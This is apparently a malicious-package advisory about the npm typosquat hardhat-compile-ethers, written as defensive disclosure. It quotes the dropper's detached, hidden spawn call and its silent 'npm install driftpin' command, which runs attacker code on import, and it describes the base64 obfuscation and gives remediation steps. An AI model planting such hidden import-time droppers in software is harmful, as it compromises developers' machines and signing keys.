MAL-2026-6705
Malicious code in hardhat-compile-ethers (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)

The package's main entry `dist/src/index.js` contains a payload appended after the legitimate Hardhat exports. On require/import (for example when Hardhat loads the user's config), it spawns a detached Node child, `spawn(process.execPath, ['-e', code], {detached: true, stdio: 'ignore', windowsHide: true})`, that runs a base64-decoded command to silently `npm install driftpin --no-save --silent --no-audit --no-fund`, then `require('driftpin')` and invokes `getPlugin()()`, executing attacker-controlled code in a detached Node process on the installer's machine. Both the shell command and the module name `driftpin` are base64-encoded to hide them from casual inspection, and the spawn options (detached process, ignored stdio, hidden console window on Windows) are evasion mechanics.

The payload is absent from the TypeScript source (`src/index.ts`) and only appears in the published `dist` artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. `@nomicfoundation/hardhat-ethers`, `hardhat-deploy-ethers`) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, so arbitrary code execution on import is especially damaging.
Affected packages
No fixed version has been published for hardhat-compile-ethers (npm), and because the package is a typosquat rather than a compromised legitimate project, no published version of it should be treated as safe. Remove it from the dependency tree (together with the `driftpin` package it installs), install the legitimate plugin that was intended instead (e.g. `@nomicfoundation/hardhat-ethers`), treat any machine that imported it as compromised, and rotate wallet keys and signing material that were reachable from that machine.
References
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.0.1 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.0 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.2 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.3 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.4 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.5 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.6 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.7 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.8 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.9 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.10 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.11 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.12 [PACKAGE]